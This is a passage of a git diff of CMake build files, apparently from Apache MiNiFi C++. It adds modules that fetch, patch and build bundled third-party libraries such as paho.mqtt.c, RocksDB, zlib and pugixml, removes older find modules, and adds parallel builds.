     set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/open62541/open62541.patch")
 
@@ -41,13 +38,9 @@
     set(OPEN62541_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
             "-DCMAKE_INSTALL_PREFIX=${OPEN62541_BYPRODUCT_DIR}"
             -DOPEN62541_VERSION=v1.0
-            -DUA_ENABLE_ENCRYPTION=ON
-            "-DCMAKE_MODULE_PATH=${CMAKE_SOURCE_DIR}/cmake/mbedtls/dummy"
-            "-DEXPORTED_MBEDTLS_INCLUDE_DIRS=${EXPORTED_MBEDTLS_INCLUDE_DIRS}"
-            "-DEXPORTED_MBEDTLS_LIBRARIES=${EXPORTED_MBEDTLS_LIBRARIES}"
-            "-DEXPORTED_MBEDTLS_LIBRARY=${EXPORTED_MBEDTLS_LIBRARY}"
-            "-DEXPORTED_MBEDX509_LIBRARY=${EXPORTED_MBEDX509_LIBRARY}"
-            "-DEXPORTED_MBEDCRYPTO_LIBRARY=${EXPORTED_MBEDCRYPTO_LIBRARY}")
+            -DUA_ENABLE_ENCRYPTION=ON)
+
+    append_third_party_passthrough_args(OPEN62541_CMAKE_ARGS "${OPEN62541_CMAKE_ARGS}")
 
     # Build project
     ExternalProject_Add(
diff --git a/cmake/BundledPahoMqttC.cmake b/cmake/BundledPahoMqttC.cmake
new file mode 100644
index 0000000..fd707e8
--- /dev/null
+++ b/cmake/BundledPahoMqttC.cmake
@@ -0,0 +1,81 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_pahomqttc SOURCE_DIR BINARY_DIR)
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/paho.mqtt.c/paho.mqtt.c.patch")
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/libpaho-mqtt3cs-static.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/libpaho-mqtt3cs-static.a")
+    endif()
+
+    # Set build options
+    set(PAHOMQTTC_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/paho.mqtt.c-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
+            -DPAHO_BUILD_STATIC=TRUE
+            -DPAHO_ENABLE_TESTING=FALSE)
+    if (OPENSSL_OFF)
+        list(APPEND PAHOMQTTC_CMAKE_ARGS -DPAHO_WITH_SSL=FALSE)
+    else()
+        list(APPEND PAHOMQTTC_CMAKE_ARGS -DPAHO_WITH_SSL=TRUE)
+    endif()
+
+    append_third_party_passthrough_args(PAHOMQTTC_CMAKE_ARGS "${PAHOMQTTC_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            paho.mqtt.c-external
+            GIT_REPOSITORY "https://github.com/eclipse/paho.mqtt.c.git"
+            GIT_TAG "6aa07f575bc9369402b1b252fd280373f8d585ef" # This is not a tagged/released version, but the exact one that was in our repo.
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/paho.mqtt.c-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${PAHOMQTTC_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    if (NOT OPENSSL_OFF)
+        add_dependencies(paho.mqtt.c-external OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    # Set variables
+    set(PAHOMQTTC_FOUND "YES" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_INCLUDE_DIR "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/include" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_LIBRARY "${BINARY_DIR}/thirdparty/paho.mqtt.c-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(PAHOMQTTC_LIBRARIES ${PAHOMQTTC_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(paho.mqtt.c STATIC IMPORTED)
+    set_target_properties(paho.mqtt.c PROPERTIES IMPORTED_LOCATION "${PAHOMQTTC_LIBRARY}")
+    add_dependencies(paho.mqtt.c paho.mqtt.c-external)
+    file(MAKE_DIRECTORY ${PAHOMQTTC_INCLUDE_DIR})
+    set_property(TARGET paho.mqtt.c APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${PAHOMQTTC_INCLUDE_DIR})
+    if (NOT OPENSSL_OFF)
+        set_property(TARGET paho.mqtt.c APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+endfunction(use_bundled_pahomqttc)
diff --git a/cmake/BundledPugiXml.cmake b/cmake/BundledPugiXml.cmake
new file mode 100644
index 0000000..ef97bf0
--- /dev/null
+++ b/cmake/BundledPugiXml.cmake
@@ -0,0 +1,57 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_pugixml SOURCE_DIR BINARY_DIR)
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/pugixml.lib")
+    else()
+        set(BYPRODUCT "lib/libpugixml.a")
+    endif()
+
+    # Set build options
+    set(PUGI_BYPRODUCT_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/pugixml-install")
+
+    set(PUGI_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${PUGI_BYPRODUCT_DIR}"
+            "-DBUILD_TESTS=OFF"
+            "-DBUILD_SHARED_AND_STATIC_LIBS=OFF"
+            "-DBUILD_SHARED_LIBS=OFF")
+
+    # Build project
+    ExternalProject_Add(
+            pugixml-external
+            URL "https://github.com/zeux/pugixml/releases/download/v1.9/pugixml-1.9.tar.gz"
+            URL_HASH "SHA256=d156d35b83f680e40fd6412c4455fdd03544339779134617b9b28d19e11fdba6"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/pugixml-src"
+            CMAKE_ARGS ${PUGI_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${PUGI_BYPRODUCT_DIR}/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(PUGIXML_FOUND "YES" CACHE STRING "" FORCE)
+    set(PUGIXML_INCLUDE_DIR "${PUGI_BYPRODUCT_DIR}/include" CACHE STRING "" FORCE)
+    set(PUGIXML_LIBRARY "${PUGI_BYPRODUCT_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(PUGI::libpugixml STATIC IMPORTED)
+    set_target_properties(PUGI::libpugixml PROPERTIES IMPORTED_LOCATION "${PUGIXML_LIBRARY}")
+    add_dependencies(PUGI::libpugixml pugixml-external)
+    file(MAKE_DIRECTORY ${PUGIXML_INCLUDE_DIR})
+    set_property(TARGET PUGI::libpugixml APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${PUGIXML_INCLUDE_DIR})
+endfunction(use_bundled_pugixml)
diff --git a/cmake/BundledRocksDB.cmake b/cmake/BundledRocksDB.cmake
new file mode 100644
index 0000000..509ff09
--- /dev/null
+++ b/cmake/BundledRocksDB.cmake
@@ -0,0 +1,77 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_rocksdb SOURCE_DIR BINARY_DIR)
+    message("Using bundled RocksDB")
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/rocksdb/rocksdb-BUILD.patch")
+
+    # Define byproducts
+    get_property(LIB64 GLOBAL PROPERTY FIND_LIBRARY_USE_LIB64_PATHS)
+    if ("${LIB64}" STREQUAL "TRUE" AND (NOT WIN32 AND NOT APPLE))
+        set(LIBSUFFIX 64)
+    endif()
+
+    if (WIN32)
+        set(BYPRODUCT "lib/rocksdb.lib")
+    else()
+        set(BYPRODUCT "lib${LIBSUFFIX}/librocksdb.a")
+    endif()
+
+    # Set build options
+    set(ROCKSDB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/rocksdb-install"
+            -DWITH_TESTS=OFF
+            -DWITH_TOOLS=OFF
+            -DFAIL_ON_WARNINGS=OFF)
+    if(PORTABLE)
+        list(APPEND ROCKSDB_CMAKE_ARGS -DPORTABLE=ON)
+    endif()
+	if(WIN32)
+		list(APPEND ROCKSDB_CMAKE_ARGS -DROCKSDB_INSTALL_ON_WINDOWS=ON)
+	endif()
+
+    # Build project
+    ExternalProject_Add(
+            rocksdb-external
+            URL "https://github.com/facebook/rocksdb/archive/rocksdb-5.8.6.tar.gz"
+            URL_HASH "SHA256=eb7d79572fff8ba60ccf1caa3b504dd1f4ac7fc864773ff056e1c3c30902508b"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/rocksdb-src"
+            CMAKE_ARGS ${ROCKSDB_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/rocksdb-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(ROCKSDB_FOUND "YES" CACHE STRING "" FORCE)
+    set(ROCKSDB_INCLUDE_DIR "${BINARY_DIR}/thirdparty/rocksdb-install/include" CACHE STRING "" FORCE)
+    set(ROCKSDB_LIBRARY "${BINARY_DIR}/thirdparty/rocksdb-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(ROCKSDB_LIBRARIES ${ROCKSDB_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(RocksDB::RocksDB STATIC IMPORTED)
+    set_target_properties(RocksDB::RocksDB PROPERTIES IMPORTED_LOCATION "${ROCKSDB_LIBRARY}")
+    add_dependencies(RocksDB::RocksDB rocksdb-external)
+    file(MAKE_DIRECTORY ${ROCKSDB_INCLUDE_DIR})
+    set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${ROCKSDB_INCLUDE_DIR})
+    set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_LINK_LIBRARIES Threads::Threads)
+    if(WIN32)
+        set_property(TARGET RocksDB::RocksDB APPEND PROPERTY INTERFACE_LINK_LIBRARIES Rpcrt4.lib)
+    endif()
+endfunction(use_bundled_rocksdb)
diff --git a/cmake/BundledSQLite.cmake b/cmake/BundledSQLite.cmake
new file mode 100644
index 0000000..0a9e1f8
--- /dev/null
+++ b/cmake/BundledSQLite.cmake
@@ -0,0 +1,48 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_sqlite SOURCE_DIR BINARY_DIR)
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "libsqlite.lib")
+    else()
+        set(BYPRODUCT "libsqlite.a")
+    endif()
+
+    # Build project
+    ExternalProject_Add(
+            sqlite-external
+            SOURCE_DIR "${SOURCE_DIR}/thirdparty/sqlite"
+            BINARY_DIR "${BINARY_DIR}/thirdparty/sqlite"
+            CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            INSTALL_COMMAND ""
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/sqlite/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(SQLite3_FOUND "YES" CACHE STRING "" FORCE)
+    set(SQLite3_INCLUDE_DIRS "${SOURCE_DIR}/thirdparty/sqlite" CACHE STRING "" FORCE)
+    set(SQLite3_LIBRARY "${BINARY_DIR}/thirdparty/sqlite/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(SQLite3_LIBRARIES ${SQLite3_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(SQLite::SQLite3 STATIC IMPORTED)
+    set_target_properties(SQLite::SQLite3 PROPERTIES IMPORTED_LOCATION "${SQLite3_LIBRARY}")
+    add_dependencies(SQLite::SQLite3 sqlite-external)
+    set_property(TARGET SQLite::SQLite3 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${SQLite3_INCLUDE_DIRS})
+endfunction(use_bundled_sqlite)
diff --git a/cmake/BundledYamlCpp.cmake b/cmake/BundledYamlCpp.cmake
new file mode 100644
index 0000000..0c9a3f4
--- /dev/null
+++ b/cmake/BundledYamlCpp.cmake
@@ -0,0 +1,51 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_yamlcpp SOURCE_DIR BINARY_DIR)
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/libyaml-cppmd.lib")
+    else()
+        set(BYPRODUCT "lib/libyaml-cpp.a")
+    endif()
+
+    # Set build options
+    set(YAMLCPP_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/yaml-cpp-install"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON)
+
+    # Build project
+    ExternalProject_Add(
+            yaml-cpp-external
+            SOURCE_DIR "${SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-20171024"
+            CMAKE_ARGS ${YAMLCPP_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/yaml-cpp-install/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(YAMLCPP_FOUND "YES" CACHE STRING "" FORCE)
+    set(YAMLCPP_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-20171024/include" CACHE STRING "" FORCE)
+    set(YAMLCPP_LIBRARY "${BINARY_DIR}/thirdparty/yaml-cpp-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(YAMLCPP_LIBRARIES ${YAMLCPP_LIBRARY} CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(yaml-cpp STATIC IMPORTED)
+    set_target_properties(yaml-cpp PROPERTIES IMPORTED_LOCATION "${YAMLCPP_LIBRARY}")
+    add_dependencies(yaml-cpp yaml-cpp-external)
+    set_property(TARGET yaml-cpp APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${YAMLCPP_INCLUDE_DIR})
+endfunction(use_bundled_yamlcpp)
diff --git a/cmake/BundledZLIB.cmake b/cmake/BundledZLIB.cmake
new file mode 100644
index 0000000..8d2d354
--- /dev/null
+++ b/cmake/BundledZLIB.cmake
@@ -0,0 +1,74 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_zlib SOURCE_DIR BINARY_DIR)
+    message("Using bundled zlib")
+
+    # Define byproducts
+    if (WIN32)
+        string(TOLOWER "${CMAKE_BUILD_TYPE}" build_type)
+        if (build_type MATCHES relwithdebinfo OR build_type MATCHES release)
+            set(BYPRODUCT "lib/zlibstatic.lib")
+        else()
+            set(BYPRODUCT "lib/zlibstaticd.lib")
+        endif()
+    else()
+        set(BYPRODUCT "lib/libz.a")
+    endif()
+
+    # Set build options
+    set(ZLIB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/zlib-install"
+            )
+
+    # Build project
+    ExternalProject_Add(
+        zlib-external
+        URL "https://github.com/madler/zlib/archive/v1.2.11.tar.gz"
+        URL_HASH "SHA256=629380c90a77b964d896ed37163f5c3a34f6e6d897311f1df2a7016355c45eff"
+        SOURCE_DIR "${BINARY_DIR}/thirdparty/zlib-src"
+        CMAKE_ARGS ${ZLIB_CMAKE_ARGS}
+        BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/zlib-install/${BYPRODUCT}"
+        EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
+    set(ZLIB_INCLUDE_DIRS "${BINARY_DIR}/thirdparty/zlib-install/include" CACHE STRING "" FORCE)
+    set(ZLIB_LIBRARIES "${BINARY_DIR}/thirdparty/zlib-install/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_STRING "1.2.11" CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_MAJOR 1 CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_MINOR 2 CACHE STRING "" FORCE)
+    set(ZLIB_VERSION_PATCH 11 CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_INCLUDE_DIRS=${ZLIB_INCLUDE_DIRS}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_LIBRARIES=${ZLIB_LIBRARIES}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_STRING=${ZLIB_VERSION_STRING}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_MAJOR=${ZLIB_VERSION_MAJOR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_MINOR=${ZLIB_VERSION_MINOR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_ZLIB_VERSION_PATCH=${ZLIB_VERSION_PATCH}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${ZLIB_INCLUDE_DIRS})
+
+    add_library(ZLIB::ZLIB STATIC IMPORTED)
+    set_target_properties(ZLIB::ZLIB PROPERTIES IMPORTED_LOCATION "${ZLIB_LIBRARIES}")
+    add_dependencies(ZLIB::ZLIB zlib-external)
+    file(MAKE_DIRECTORY ${ZLIB_INCLUDE_DIRS})
+    set_property(TARGET ZLIB::ZLIB APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${ZLIB_INCLUDE_DIRS})
+endfunction(use_bundled_zlib)
diff --git a/cmake/Compression.cmake b/cmake/Compression.cmake
deleted file mode 100644
index 498b974..0000000
--- a/cmake/Compression.cmake
+++ /dev/null
@@ -1,58 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_bundled_zlib SOURCE_DIR BINARY_DIR)
- message("Using bundled zlib")
-if (WIN32)
- string(TOLOWER "${CMAKE_BUILD_TYPE}" build_type)
- if (build_type MATCHES relwithdebinfo OR build_type MATCHES release)
- set(BYPRODUCT "thirdparty/zlib-install/lib/zlibstatic.lib")
- else()
- set(BYPRODUCT "thirdparty/zlib-install/lib/zlibstaticd.lib")
- endif()
- else()
- set(BYPRODUCT "thirdparty/zlib-install/lib/libz.a")
- endif()
-  ExternalProject_Add(
-    zlib-external
-    GIT_REPOSITORY "https://github.com/madler/zlib.git"
-    GIT_TAG "cacf7f1d4e3d44d871b605da3b647f07d718623f"  # Version 1.2.11
-    SOURCE_DIR "${BINARY_DIR}/thirdparty/zlib-src"
-    CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
-               "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/zlib-install"
-    BUILD_BYPRODUCTS ${BYPRODUCT}
-  )
-
-
-  add_library(z STATIC IMPORTED)
-  set_target_properties(z PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/${BYPRODUCT}")
-
-  set(ZLIB_BYPRODUCT "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_BYPRODUCT_INCLUDE "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-  set(ZLIB_BIN_DIR "${BINARY_DIR}/thirdparty/libressl-install/" CACHE STRING "" FORCE)
-
-  add_dependencies(z zlib-external)
-  set(ZLIB_FOUND "YES" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIR "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-  set(ZLIB_INCLUDE_DIRS "${SOURCE_DIR}/thirdparty/zlib/include" CACHE STRING "" FORCE)
-
-  set(ZLIB_LIBRARY "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARIES "${ZLIB_LIBRARY}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_RELEASE "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
-  set(ZLIB_LIBRARY_DEBUG "${BINARY_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)  
-  
-endfunction(use_bundled_zlib)
\ No newline at end of file
diff --git a/cmake/Extensions.cmake b/cmake/Extensions.cmake
index 438a783..1c7422b 100644
--- a/cmake/Extensions.cmake
+++ b/cmake/Extensions.cmake
@@ -91,7 +91,7 @@
             PREFIX ${prefix}/${target}
             GIT_REPOSITORY ${repourl}
         	GIT_TAG ${repotag}
-            CMAKE_ARGS ${ARGN}
+            CMAKE_ARGS \"${ARGN}\"
             INSTALL_COMMAND \"\"
             )
          add_custom_target(exec_${target})
@@ -100,11 +100,27 @@
 
 	file(WRITE ${exec_dir}/CMakeLists.txt "${CMAKE_LIST_CONTENT}")
 
+	# Try to determine the number of CPUs and do a parallel build based on that
+	include(ProcessorCount OPTIONAL RESULT_VARIABLE PROCESSCOUNT_RESULT)
+	if(NOT PROCESSCOUNT_RESULT EQUAL NOTFOUND)
+		ProcessorCount(NUM_CPU)
+		math(EXPR PARALLELISM "${NUM_CPU} / 2")
+	endif()
+	if(NOT PARALLELISM OR PARALLELISM LESS 1)
+		set(PARALLELISM 1)
+	endif()
+
+	message("Building ${target} with a parallelism of ${PARALLELISM}")
 	execute_process(COMMAND ${CMAKE_COMMAND} ..
 			WORKING_DIRECTORY ${exec_dir}/build
 			)
-	execute_process(COMMAND ${CMAKE_COMMAND} --build .
-			WORKING_DIRECTORY ${exec_dir}/build
-			)
-
+	if(${CMAKE_VERSION} VERSION_EQUAL "3.12.0" OR ${CMAKE_VERSION} VERSION_GREATER "3.12.0")
+		execute_process(COMMAND ${CMAKE_COMMAND} --build . --parallel ${PARALLELISM}
+				WORKING_DIRECTORY ${exec_dir}/build
+				)
+	else()
+		execute_process(COMMAND ${CMAKE_COMMAND} --build .
+				WORKING_DIRECTORY ${exec_dir}/build
+				)
+	endif()
 endfunction()
diff --git a/cmake/FindRocksDB.cmake b/cmake/FindRocksDB.cmake
deleted file mode 100644
index db9c2d1..0000000
--- a/cmake/FindRocksDB.cmake
+++ /dev/null
@@ -1,51 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-# 
-#   http://www.apache.org/licenses/LICENSE-2.0
-# 
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-#  ROCKSDB_FOUND               System has RocksDB library/headers.
-#  ROCKSDB_LIBRARIES           The RocksDB library.
-#  ROCKSDB_INCLUDE_DIR        The location of RocksDB headers.
-
-find_path(ROCKSDB_ROOT_DIR
-    NAMES include/rocksdb/db.h
-)
-
-find_library(ROCKSDB_LIBRARIES
-    NAMES rocksdb
-    HINTS ${ROCKSDB_ROOT_DIR}/lib
-)
-
-find_path(ROCKSDB_INCLUDE_DIR
-    NAMES rocksdb/db.h
-    HINTS ${ROCKSDB_ROOT_DIR}/include
-)
-
-include(FindPackageHandleStandardArgs)
-find_package_handle_standard_args(RocksDB DEFAULT_MSG
-    ROCKSDB_LIBRARIES
-    ROCKSDB_INCLUDE_DIR
-)
-
-mark_as_advanced(
-    ROCKSDB_ROOT_DIR
-    ROCKSDB_LIBRARIES
-    ROCKSDB_INCLUDE_DIR
-)
-
-if(ROCKSDB_INCLUDE_DIR AND ROCKSDB_LIBRARIES)
-  set(ROCKSDB_FOUND "YES")
-  message(STATUS "Found RocksDB...${ROCKSDB_LIBRARIES}")
-endif()
\ No newline at end of file
diff --git a/cmake/LibSSH2.cmake b/cmake/LibSSH2.cmake
deleted file mode 100644
index fc04707..0000000
--- a/cmake/LibSSH2.cmake
+++ /dev/null
@@ -1,94 +0,0 @@
-# Licensed to the Apache Software Foundation (ASF) under one
-# or more contributor license agreements.  See the NOTICE file
-# distributed with this work for additional information
-# regarding copyright ownership.  The ASF licenses this file
-# to you under the Apache License, Version 2.0 (the
-# "License"); you may not use this file except in compliance
-# with the License.  You may obtain a copy of the License at
-#
-#   http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing,
-# software distributed under the License is distributed on an
-# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
-# KIND, either express or implied.  See the License for the
-# specific language governing permissions and limitations
-# under the License.
-
-function(use_bundled_libssh2 SOURCE_DIR BINARY_DIR)
-    message("Using bundled libssh2")
-
-    if (WIN32)
-        set(BYPRODUCT "lib/libssh2.lib")
-    else()
-        set(BYPRODUCT "lib/libssh2.a")
-    endif()
-
-    if (WIN32)
-        string(REPLACE "/" "\\" CMAKE_CURRENT_SOURCE_DIR_BACKSLASH ${CMAKE_CURRENT_SOURCE_DIR})
